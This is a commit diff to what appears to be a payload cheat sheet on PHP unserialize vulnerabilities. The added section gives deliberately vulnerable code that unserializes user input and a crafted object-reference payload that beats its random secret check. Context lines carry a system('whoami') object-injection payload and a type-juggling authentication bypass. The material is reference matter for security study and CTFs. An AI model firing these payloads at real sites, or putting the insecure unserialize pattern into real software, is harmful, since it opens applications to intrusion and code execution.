2nd unserialize payload

This commit is contained in:
Alexandre ZANNI 2018-09-26 00:13:19 +02:00 committed by GitHub
parent d49e40b1b2
commit 3cf806c8ff
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -45,6 +45,8 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
## Authentication bypass
### Type juggling
Vulnerable code:
```php
@ -66,6 +68,40 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
### Object reference
Vulnerable code:
```php
<?php
class Object
{
var $guess;
var $secretCode;
}
$obj = unserialize($_GET['input']);
if($obj) {
$obj->secretCode = rand(500000,999999);
if($obj->guess === $obj->secretCode) {
echo "Win";
}
}
?>
```
Payload:
```
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
```
Ref:
- [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
- [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
## Others exploits
Reverse Shell
@ -98,3 +134,4 @@ echo urlencode(serialize(new PHPObjectInjection));
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)